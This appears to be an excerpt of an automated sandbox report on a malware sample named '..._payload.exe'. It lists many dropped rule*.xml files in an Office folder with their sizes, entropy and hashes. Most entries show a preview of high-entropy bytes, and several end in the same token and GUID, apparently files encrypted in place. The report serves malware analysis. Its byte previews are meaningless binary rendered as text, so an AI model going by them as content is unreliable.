                                                                                                      Preview:<?xml....T...V...X....*.......5..".@..x.:O.....X.....d..j.hj...$..#.m[..."..c|m.t.....g.L".8........S.z~....m..h.&.$.<*.4.........(GI..Z.T....x..|...@...G........de.@'.X..".n`..Y...d....K....Ie...b%...~`.7.M.G3D.L.{....E..:..U...LW.I..|J{..[.M.]y.......m....aB9....;.#..y..../.......J.....9=Y.-2..=.1.7.je.!..7>....K.6..lqkT.4..P.A#....g.r....t..T....8V1^...g....f.w8]...........Q.A.-WAfg.$&v..s.d?t..5./...-zZ~.!...[....X.....v.&{U......k.;xB..Ic.)}&...g.":..xRA..`..2.?.mi.n..$.!...\.|....;....|...!..u..}"0,.!%.z..b\O.T..5.w./F5r.cj.......L...5Bm...g9c.i..q..3+<.'...;ni-t.p.... m...........,w^..M.y.x...;........N..N...-..^.I...~.(....M2.7=S. .;vJ........$M...D..9.V..-..Yo1..Y4...4.../.J.A....{_.r$.F;......L.d3.Cs...w.X.qaj.!p..>.&.sZ<NEx..N'.$?%..........[".8.@.".7...I.k..^..,.5.......S.}^.:^.X..........s.XRU....:...6....f].B..Z.Xp@*".u......?..........u.?;.9......f/v.*.9d....-$e.....G..R.:..'.7{E..N.-...P&........Ae...-,tw...g......K.$..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11890v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1419
                                                                                                      Entropy (8bit):7.845324504487242
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:4U8gFz1wze8mv3AXPI1eQaGnERLK0cgwMeRmSZL1eSR16KUkYCkX2AOq4Czv6bD:7z1J8ew/Iw+FdZmkL1eKqCKMSzwD
                                                                                                      MD5:5C7E30C2FF9A5DABAD16165F94266AC8
                                                                                                      SHA1:2001790D2F3EB3089DA0A9B59F5E241A680667B7
                                                                                                      SHA-256:25110F9D8A2EEED2F957728E43852E720C46C5D711D53FFB8D6722B25294AD42
                                                                                                      SHA-512:9AC265ADBE9C385B8EDF34738A31D4390D1C63EAE9D9DD74C11AD7B9AE02E6DFC9F95BB087EF4BB827648F4F90318B466799E0C7A3175D13DB3BA7EC4C8BA64C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlE<.......x..9_J.>(.m<...h...#..p........~.^...6/..+.+..j..d,.gzQ...`......Xa7mG..?.....`....B}X.3;.q. ..... j4..=........".f.(.@..(...g....v..nHZg.aH..k.V.#Vc...*....m~.q....8..U..+.....Z9...^..s..%..y[..rE..M.aiF|t...`Zh..NSDE.sh.._.V..F.......57.2:...>.g..8..\.{.Ji....^.J.I<......9...X6+Fk..?Hf..1.5..cPX..=n..12.58|.Gi#................]..".....T.|]s...t... ?W.1.MO..3p.J.1$RT-...yP{.p...e...W.{.e.&.KP"M.a...r_L..@..,....(......Px.*.tx........w.:.T....a...%`..l./.....:&......c..S.I.*...P~..m.R,F.|.....e...g...J..>...Ti..>.a..}.>.o].....W....Lw.tx......P[.R.XCH...fjv.Fe.e(...UG.........eBg:^.-..Y..#.Hh3J.L`.|f_5{.!..X>..|Q!..E..S..?.."B(..Y..s.?..^.A.l.*..L0...Q.....W..*V.+F}h.%..n...Z...V....m.'..CU...R....uY'....78P...S.=.*...q.c0.?!.t....P.Vv7..@..73|S!......:K2.v...^z_...`.&.?...a.t.=Z.VY..e.........p...nT.bC>.F]...;.oZ......y..(z.o.#..W.VA..O.).<.ez..}..D5. ...|.#.F..,.(../OE..M>......c..>...R.....!.Vc.;!M.?^.^a.y.....6.q.Fd).Qw.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11930v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1546
                                                                                                      Entropy (8bit):7.8768745819585515
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:vj6Qm9stLE2hDwSMxO7EsX9T6tFpYmCFW+xko/lf6MnptjACv6bD:vWaLZ8ilmrC7/nptMCwD
                                                                                                      MD5:5E28804EA05E1EDF571045E5DF3A31CD
                                                                                                      SHA1:8A2ACE84DD588CBC167FF57CD9D3B6B5825DF719
                                                                                                      SHA-256:3BB515CD6FEECBE0C57B7DCA683DCC70B02B2B9E69AC5D711AB21B8DF0113AAB
                                                                                                      SHA-512:D0B14684E2ED839D70F2DBAF43AD7F2E8D65B95F7FE7DA6EC83E9CA4D09D3D3650DB0DC216098084BC727208E9AAE1760B2D7E0BD42BDB42C988439D6B32F8C0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.lYE..+2Cr.G(a9_}.Pr.@.D..`..P..+Q.Ro...........:pg...20.k:.Ml.F.oA..OI%......l/.R.".y5..^.......U.} .......d\....w..W$X....\..Oz<A,.t.T.!...9.......5.....r.;.^.sfBB.~.\...Uv....Wh..z.o..)...0kf7^.]....7[.....$F"&..;..q.n.hu..4...r.......M..;j%..1..6....6.p.0...6.}..ST3.lA.>$6....]....l...[9.".J.j.:BpKu"...q._.0}...J.PG.....u.D...A.^. ....\.E.......1. ....3..1c....o....^%.../....$.$@........kJ... .!.+.T.p.u_U..$..Z....:.t....S/.U.V~..(..}d...Y..%;..|.b.....|.2..3.?%iCC..H.J.<.4.X...C...&p..n7..G~[.....G.f.N_....-......oi:S...p.K..2....z6.r..X..vI.......tn.&F...s.....X...+1.....g.>.x.nl.............ya#..Rou.F..~,.#...#.B).p6.S.<X.~.H.@....v...2"...I..$..(v....vZ.c.@...J........e(.u......B.;..F..S..o.?{Vi...6...7...|..;.......<....in.<...5'Dy:b...^z.s.{.3..]-.......@...cm..s...7..9.\.?f....8U..e%....^"-R. -..|..T...]..'...*.L]tA.a..8......\B...HU..}O.O..K...........!.Dy.F.Kyz..G..<.m..Gm&.:T.N.p..R9.{z.Q%..{Y.d....f.S..I...f.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11931v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):903
                                                                                                      Entropy (8bit):7.75908297122456
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Rjtx0D4X0Hap+QNwSZ5rl9wWNyWAr2dci1sJwiB30upxv6bD:d0kX0HU+QNNZ5rlDyWrWXPBkOxwD
                                                                                                      MD5:7165A55692E9E4FD2E9C36661ADDB08C
                                                                                                      SHA1:4E5DAFCD3A850C9B315D8F10D3202BC71AA000D2
                                                                                                      SHA-256:C21B8851B03533B795A10534A8FD915E9DF30ED778F22F42A5AB8B10CD5F9433
                                                                                                      SHA-512:0E59A89A3AB511D6585B0011D55E89105B8CFC251BC44A12101AF35EECFCAF4F55238B2A45441F09474B644EDB55AEA1781B3852184294AC19AFF91E67A8DA3F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlsD...g.y.\.1.o .'..5..k..;(.*........S. cW0...~......&6..|..="..%..~.'`p...<.........L....-....9........`.j.B.~.6.......h.`"R....;........0?8.m.W..`...[\...aaL.+#...z`~d....8.....H.L.'%..;..f...k$...m..4...B6...X......~..y..v.x..s....+}}..}.E~..~...N....nJB.....O{..hO=......v.....E.h.-9..c|.._K.0..pA.d..s...........lDG...?..FC.,ig..L.....)("..bg.<....{z.su8....}....DL.q.k(B.B....T.v.'V]`.~.d.u.O..>~.b.'R..T.G.1W0.x.o...$J.2...xs.$...d..y.=V?.o,.|...T.!1....\!.....A...WA.s.P...)....MW>..2..~8 $/Y.z...S......nRr....NJ.#Stk7.q}....5.\..@...s...A.s.E%...v..G......./B...#.s....<_.g..L.?...YJ.M.[.;.D.T..5..`.C..m..XQ.[e..0N..Q.2.....06.4.<Z.......>.'..L..k.].9...~...Z.L....K.E..u.w-.y.@<%w.<.;.7........j...[-.pgc.o..j......o........Q{.$.."..1...T.ZqJ...y..-.^.K..V..2}......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11932v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3566
                                                                                                      Entropy (8bit):7.943918796947947
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:/G4wbDIlXEFMsMK9aP1ZV1w84j6ta+C1+qlU/cv:lCDIlXEW/KAdZV1w84jUa+W+qB
                                                                                                      MD5:14253A79F1B5D991223111E2722F04C6
                                                                                                      SHA1:5742C722BC1391F22CA944A308C3C7D8B4370DE1
                                                                                                      SHA-256:C55B22010F3A596607DE435117069A75AD1A03E32DD481EBF91E62E0AC728F17
                                                                                                      SHA-512:189E946C26EF2BD57068A2840E7A626E02AE4B1B5C634018D000BF55469967047B96A64328D025FBB0FFC819EC0AB60313A412F2750B875577024A0CE5286EC2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.ga\|...../r.z2......J.R..[.....s.N.EJ....:;(..`.G..XL...m...e.}.....f....I.....Y.&.....\..rc.#3..4.=i...%%m{......#........n../...........k..U`._.U_U.........1[..**=.%.F1.7z].f....N......^$J"..=.#.!9D.-..H~...d.tTJ"......**F.......zKmZ.G..7..}...oD.....<..q.J.V.O..T.[..h..xN.(.ls.oS2P[0..(y....A..!.......wx.1..s).A1$.99...A>/...s.I.#_J'q.ZH.f....z..FWg;. ........`..A9.g..&.Wg.....~.....G.T.'ExG?j.l....sP..f.7]..O.!..z...,(....}.QV.&.F... ...u~.\.9|.=.vx..%.$&Q.L\.....w...7H....QXl.U.3.=..j.#].....?..?.....`.Q..^.1C!en+.....`.......3}m.l.=.g..o...5.#Yt. IXY.=.ak F.~u./.FB.Y&}..4..}....mVc../...O..mP;}....+....B%........%f0.`.....c...*tti..ei#......z.....$r.N......P.u..`..IS..~...C1@W..I..AD.9(..i.,Z..S.1Y..y..)3.%f|PM..A.B#p7.R5..........`Z3WQ....s...,...........W.p.I....v)......A.]..rz...i3...R....~.-....L..2.......L..Mc..;h...4./.\..~`j..J..0[.N@....|...,.X.<..#w{<C...a%.[...@c..i..Y....U9Yr....e.e@...".wA......&.&.a...jB.14.Y

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11933v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3677
                                                                                                      Entropy (8bit):7.948502575834576
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:e221Otzpy0WweOIErc5NGwjYmpBa1qNZfjFIB0Ktet6xOiejKq1nIW+ac0wTA8Ks:e2eO3veONINGwXXx3tjtjtIW7c0wk8/
                                                                                                      MD5:1C9D8F7632D624FAB0220E29F14E1BD0
                                                                                                      SHA1:2CF9F7C90F72045707FCDBEC2CB2FCA85A051354
                                                                                                      SHA-256:6B6D754E4EF774D64E54652CB2F5D1B7A1B4833F8E7C7D63075D892A30899D5F
                                                                                                      SHA-512:0463AEF845A505CE3CB7A5C71F1354433C292F1FFD7E61534C383D768107473BCA0D1FAA0F0455A68E926F05E6468972595297FBF8AF68A5B12271AB2DE23F3C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.}.G8~..%X.w..|>.f."}.M.....V...T...G.!.E.3.m;b=...L4"B..{.|D....9.M...$.*...x....{Q`....Q&.K.ac0....*..1..A....x...ga;.ns.!C"....}.T.abv}..[F}.>.n...l.:..T......e...>xqP.O.=R....#..F=..ng.o.....l...n...70uh..9..d.=..W 49)...@.JH..O4u4...e3?-...Axu.*...Q.E<.-q.......{.....0.'..sC..Q.>..jO.u...#o......Wk.....c..@.,.`z...L./.l....<. 1..RV....Bs[...Rzq..~.?VB-..R..BK.AZ-D...n......p..Q..\....#.%.C....V...B.- .....u..x.;.!...Ki.l[....{.zoI.3zZKhh.....-.Z..^R....%...I........_~8z.Kp...E ...V.kO~dp...u<......8H.k...i..y.X K........b.:......&....B....B.\[.5sW....^....t.....mu..wCA..8t..h....d.R.5.....Q......K.......6..v...O..'...o..].x..{q.-Y..~...>.J.T....{D...g.\L...Mc....~.....0.0.K...p....a.B]X$.+O.Z...2H..^n @...IZF..a...s+e....o.ii]....;.....&.....[...S..D.......:..Gl..S9<.[.E.ay...F.V.b.......rl.........)a.....O.....?7.;.Im.;.B8_..K3F].H....@.o.V..u$b.k.w`..j.....".fTO.z..t>.1_;.AWw..h@D.?......F|.....LS.J..ezx.sZY..L.W..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11939v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):744
                                                                                                      Entropy (8bit):7.631673068526826
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:2ZUFkoGm+9ir70W2Q39CvtAfxwmcv1wsX8DV4si0QeyHPInUqAOxosBY1wfKJ5z/:2eZJ+9c0q3Iv9y0Qyr7JHPaesW19joDs
                                                                                                      MD5:2395466D5E992D1329CECA04364F6DFF
                                                                                                      SHA1:AA44D62182B27F8641C98995E17877683C37C894
                                                                                                      SHA-256:E96FC785BFC8415AC46BCA04DA48A6E9326BE1ED3E84BFFBC05403C1FEF409BE
                                                                                                      SHA-512:48ADA744E3E29E3979F4F3C99ABF687F8E9D0BF900D40DDA00ABB0CCBAB562321F2C0F199D82B9B12B2652E2E0AC3838D22C7088BE32CB80FD0E6754E62855B9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..Nm.....13..S.qx....X...H"...7_A...O.Y..`.B..U..7..../..?q.}...L+....2&Qn.zo...b......t..X......N....#?.I. ..vX..U...!.&=2`8D..q.Z..3..a.x.;.k...}p...Z..B.......l......}."P..9...?^.*Qj0.\.....njC3......L......;V........j .!'..'...uE.X...k.vJ...e@u..A=u..#.h2.W^$Lr.Cle^.xw....e..n./.O{..Vs...I<.r.....n./....B.....a9.dn.....1.(V:..O.m.../.....E.,.3,.OC..t$...BV.Rv....7lH.0.Q.-..k%K.6.87..XW..$#.....1h...j..4.x90..?%bLUu..;.'...~.k.n.5.5.e..R....".....h..M.../.Gk.Y .$.5.......+....wT.W!"1Bo...aP.~.JAt..\.}...`..I....88...=t.LP>.kL.t8.od.h...J."...T.Q.....{P.#Y.B.....i.....g.)..H.Lr.Gb<./...NW..tY4{........j....z.......a.iB._.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11950v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1620
                                                                                                      Entropy (8bit):7.859190034338774
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:T+6ZUXAFxiensfoRPfptHW75Y8CLsWo1SRpwD:y6ZUAFxbGoEuLy
                                                                                                      MD5:D9F1EC2340659DC20B97F7557C5B5269
                                                                                                      SHA1:AE41383ACB837E9570CD00433B5A2FA16DE278D8
                                                                                                      SHA-256:CCBF9FDD3EB0AD8D0830F32DF93EECB444444DEABFA6235E9EFCB0F51E134723
                                                                                                      SHA-512:A79D0F7898853BB554AE7CE1767E233BEFAAA7A64A2C04176FF70788D5B39658F0B040C31F7B74F51AD4373D12635FC5413587BB9B1947BC4F76B9050BD3D265
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml>Q.~.u.S&A51......T.qj@`......#.c...y.k...:j._.zi.p3.....Zb.........,..K...+j....V*^. .>.[...E.}J..M1.....G..0.QW]......10..p.d,....S..r.!,..3.2t...[L.`A....Q......J..7M....0-c....D:.N.. .8..Z.K..W..$\..x..7\..a..H-mT..+...+.d.......... ...z.}..^...q....khKzG..3..+.%..5.. w.......o!...Z....p(.e"....B..P`..c....?....y..h3.{.......r...r."...._......z.3g.@..{>Ei..{..s.I..6.{.x..G.M...[SZ.a...E..... .^.BtP53.(1`ty..../..}.c........D....?..8N9....:i.2>....M..$.a.1p)diG*!,.5.\...:M.z..e.iD.d...6.f.....2..@B......h..Z..E..x.yyMF."Pl.L.R.....3m..B.r..W.....^.2.....r._X...X|..>).^..2...4f..3::.....3.d.x.]aP..y..[h.7o.=6.`..p.....&.$.J...*....V....6.O....d.j.-.m.1..lAN.0..<.......+{..U.....%.Hizu......f.{X...b.....!.l....j.C...1..]L..\>a...S....8.....)...K..r^{.....D....9..1...\OI..8..T...6.y.H..+v..j..M...Fi..V.jd.c"..d .G.."..kg..L..jAT..r.]qQn.N.B....].;....&.n.@...O.KpTePJO.Hh..Pw...}..(J....^3l1.....HP.5...l,..q.......\.z....jWg..PrN.1t.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11981v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):821
                                                                                                      Entropy (8bit):7.688196406726222
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tdWMF9mYP7kFunYtzpfRH6dSoaJKMk9GuknXWepCznHn10luSUUv6cii9a:lQOY5/a3a41GuknpwTHm1v6bD
                                                                                                      MD5:6EA554AE0469E5663B4CA067F6E3C184
                                                                                                      SHA1:F29D2617B6F973D39879571D8294288AF0FD2D92
                                                                                                      SHA-256:81165489642E7C4179615CA5F46CD772BB7A757FE88EDB412D56D6000FFF1A41
                                                                                                      SHA-512:68F053B4339A7039E23F3068FE8647741E522B41F5328B78E3234EB16DDF92F8E8CAA0399DB93528603705F73B9B86081E929DB64EB11D37B8E8BD93E8F76669
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.T.e.sh.....2.7..j%..7pg.n...q...i..,..<...D'<.J..y.Je.f.....1FQ.N>0.|..NE[5..u.. .-*....g....5CE...X...e.~+......t3e".....x.-..b.7.a.V....u1.i.....d.T...d].PzhD..U...Y.J..d.6.....>j`..Z....z).8.}..N..v....O...$.R..1.-.'.<..b1.}.U.y....JC...6...F..H(.~-.j..z..q}...).XUV.[............i."../.".FC;.(aDE=a.K.H.LJg...t....y..<...0W.....J^M.O..p.W.{.9K.u.g.....JWW......C.w.. U....Q.Sv....T...4.........a.g....-f.....<.!..~......G..Y!.....F.z..LH..`"6{. .o.i.5..Nj,.......*..@.........Rk.e/X...#....h..G.v..$X~.........!L.B..6..1 -.......~..Y0..>a.O......q#-f...}G..l#..u....2.F.^R30...^.G.h.i..r&..-.t.U.......N9......hC.,_.r..H{...t.}.K.."..4j*J.c`...i..(....1!.!.2/.d....w...<.2.n.H=2.>....Ov)."<#n..#.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11989v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1034
                                                                                                      Entropy (8bit):7.802860185377958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:BQkYeSVqUiuSpa57XlQI3SH2b5IZCnv6bD:FYeSVqUyKiq+6wD
                                                                                                      MD5:7817F3FD20CBBA90A54E89A508D64D5E
                                                                                                      SHA1:F1A8360370337CDA94B4050C3DE84160F5EBE41F
                                                                                                      SHA-256:35809DBAD5EEC217FF8A86F2E0CF199B69D1D7CD000CB6FE9FA03238E4D0F8DF
                                                                                                      SHA-512:09796F5C3581EAE2305CD7032C6C3C278E64F1BEE23E565F8FFAA9A70D7A72E9E1C2FAFCB22E1742B3390E7758D9ABAF88FFC5989DFA80CAD155039BBFC6B525
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlJ..RN.H.v.xy6^.{...M|.,.98...s....B.x..+...8.....8.DEy@.-.4...Y.#..:.%&..9.......,.?.v4....p35....}....Q~wc...>..zY'.6P.n....K...(...].gt..f.8.A...g...|^........!..v...h..R|.*d-......L....:.r.7P.jn.M..h!.bv`...A0Iw......K....y.....8..|...K.O!Y......9`;....`.....%I<....}ha...=w.y..W...\....e..........,..5;....O.v.scZ....mJ.......&...........Z.........#...=..V.w.........EpP..R^R.6.P}.'.........B...\..3..[..uP.B..n..4....3......-..D..%.L0^!.0;-..i$.j.w.......8.....5..p.?.......G..N".\R.S`....e.&....@."&!.F..l..f.`.N;....l.}J...I..|`l.j....o.....Y.;...z.p<.:.1.t. ...2 ".....G>.f...V....0.Uy.k[...xo....,....+.W.k..Y..{.Ol.|1..E..v..ISS..h:.d.#......U........-....M.oH{..^...%M.Hx.r...D..M!.Pn...Z...:.....Y.t.2(....<.1E.u....~.x.cK...H!.{.d.....,..o ..?'..[....*v...),x....>...B".'z....1iC*S.?Lb.16.F..g....WF....A{..V4e.w.vr... .X.Z9...Q.h(..qq...%...gDt...R1....wY...[16.s.....{.......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120100v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1333
                                                                                                      Entropy (8bit):7.8405088318747715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mbuhY/TOLGg+5HZynn2eiIHfRRqvMVSQgZY1jv6bD:myW/fPHMn5iIHZRqAd1jwD
                                                                                                      MD5:F4997B7646E3BF7C96F8B453E5A88CC6
                                                                                                      SHA1:B94E43A537042E742F50CE4D89D4E4978B0641D8
                                                                                                      SHA-256:78BCEE4F2E85336831F65D4248D12BDD7025B67BE2F3505E76264F73F7B5259A
                                                                                                      SHA-512:A9396594B228C2920B33DE8A9989861420B168F62A2BE9A76FAB1C754F0050FAB5F87491D13DD979F401174D735662A2767553E3718E0C3842FB1D3875D8E5EF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.).j......Gd...a..P_5.O............).)a[.3].j.M...[&....E....U8...V.{._'^...-V..L.c-VN\.XE0.j%_..5|...L.`Y.y......h}=..:..[.Z..".x)...zi.u->..w./.....m.P..>....j..a*...^.....T...$...".[mfQhOZ}mfKOg.....?f'8.....t...S.....P;.....=-..{T?.n'...mE...-).7....d...$..g....Q,,y.j.L. V..H.Af....;.....5|...0..G..a~.Tk.:9.V=.%.x...e{=..a=.}.q....%.f..Z..#.&.f..../M..#.........r /.n......d.r...=Z..IP..>...t...R...]a..C..}.......".KI.hd.h2t....P?..z....S...wZ.....;<.9......{..T..>......[.....0.'.O.b...!v..).<...A.%.FH?.....5...|0.P......O.).&..N..Y..$...eV..4T.v1k..i..'9...np.?}[.>..6L.fV.%...s8".......Q6...^.cE...l..'...j......!'.#.....AQg."...V.DT..s.6..|....`.km+#j:o.A.>y...e.[I...=..-h.=W.e..././.......g@.M.x.{N.....3..|.G.<.lMI%..5......]..cgWh.S..W*.f:...._..T.......9.]y..Km-.5.`...V.m...JF..)w....za...l.D..49.f.L..n)..#.z.j6......1.S.K;......mY...qAb..nD........y.r..-..B.Od,.Y..s....d..\B.e>.;.E\kK.<Q*(.....=...~N....sCR.hU..?....].jh.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120119v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1665
                                                                                                      Entropy (8bit):7.86545116187223
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:jXumevnWs47EJOgFJ4ukLLYtYFNZbBnhKINq4wD:jXanB47EJOgLQaYFpcIsB
                                                                                                      MD5:DFE5AF3969CE7B0F363139D290B1BA3B
                                                                                                      SHA1:37235BEE857A90315C5EBF5E0C75B9B9908C2F9E
                                                                                                      SHA-256:8BFD4438B405AD8D314A45750FE46A1AC93959F367A06693203FB7553E36C456
                                                                                                      SHA-512:DB177366B5D27BB3921261F66C493D282DE20AF915534B4D39A70965892AE2CC49CA66D8257418BB57E14E008EF34E4DC6C24FB7C372B31412EC3B4A5147F1B5
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.5....Y....X....k....$#.].v.v.?y ..S..'.4G..WSV...B8.M..ap.A..2V.4.^..A.L..O.....RF+.\..2.b./U.N.N.<..P6...K.H..X...!.-.fqzq@...X%n"........k......M.......{....2.h<:..t...bK.d*..|....*.i.....z...ll0..D..y..c}..%5N.....^.j.....Db.AE'..,Z..`...Zb6}.....N..}e.v...J..$Sx..K>`.~...+.p.v...A7..P.........FKzd.....NG.=..y..oo..L..b.}[..p.e..<.r..T........"...'8s..z..eD5 ....%..m#-\.d..i....^..A.~.....EM...A..0....2.................L...68....+^.....r~.L.=|..E.g<.....e3.=\.t......u.-....5o....^..I-^..w>}/.22.`.4.+L.3...b.D..r..b.Q.9.E7.J..d.u.......5..k....j.L.|.Yvq......<..R.....|....|....N....t..z..^...$...>.R..M.W..H..aL.!M.}r...b!]<A.ML.t.G./x..$2.g.X`....X.ih.U.z^.lbP..l.LD..>........n.....w{Z.Ql65`....4n..J...'...E....a..}...z|!9.....E...||....../.u9..P...0.....j.~v.!....<"r.m...].U..Y.Kg.....}.f..g.._2}....._.3*.WHK.K.Ut.x.$..m..?t2[..~.pa....@.......y..dxe.i...y.'i...r.}c(...3...}.j`..e.3..E.*s.,[gZ...O...O..uWB..@.,..n.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120128v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):992
                                                                                                      Entropy (8bit):7.784822451840913
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pQ1TE1oIDk0nucE29wIp4dpjB5S0LdMv6bD:8CJucE2OIp0rPLewD
                                                                                                      MD5:8E3C554D499B3C4D06B1D9B503C239A3
                                                                                                      SHA1:815437D2BC38370A9E71846088BCDD890AF64ABE
                                                                                                      SHA-256:08F9BA89DAF5695D8BCD6AEEA16579196151CF3231712B44F167634895FD61DF
                                                                                                      SHA-512:9AAF4434805DDBE6397AD06D452F2DEC292D3780BF737F372AED0D728A3FC6BF9EA50967AB81975A4F800C3E571B3057E83C837ACFAA35FD949CC90FEB5333FE
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...[x........pLn......@$A.^6. .Z.].g.$.\QY.1..{F....8..W..=~....S..IU.^V.C.<.G\.U......+..J......C.h.......Vs.?....":... ?..m..E>A."l..:.Ub....<.PTS~....T...#..#...0-{.P-1...,'|..+^`...9..0.F...@/..i..... M....a)`..`T...(X.......0....4|F..(N.g.v...E.Z.Q...G$.4..n.!.......r...+G.&j.]....{.HJ..~DV:.EBe....u..o\b....2...v.C.N.INi.(V...7....-.< YpK..bk.....}.r....r~.0.%o...z.gqexgL...oZ..&...:j..x`..o.^t[........K.0...j..2....@v..gJ..?UUCb......sa.7Pg....[....S...4..2N......E.~UpL..aL.d..z.%.\..!.<.lI.51.Z/42g...].x..B....QS.B...(..?..u..eF@....:5j....ek..w7..r.<..3@.C..3au.....(4V.2h<.^......ry..:t.s6J.Q....~U9.L...I@JM..CiW..TH;..S.7..>.7z2..~....u..|......C...<...cb.i........i..)K......*....[.Z.w....E0.i.....J.l...g<.+...=c......E..9......+.V...T..k.7.H.h;..U.3uQ..<..)s.L>.0.F.a..O.%.ic.j.e..F.7...W#.H[4..~.Tf...^.....=..z.. X..k7..L....s9T.*.m...E,..'u.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule12019v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4150
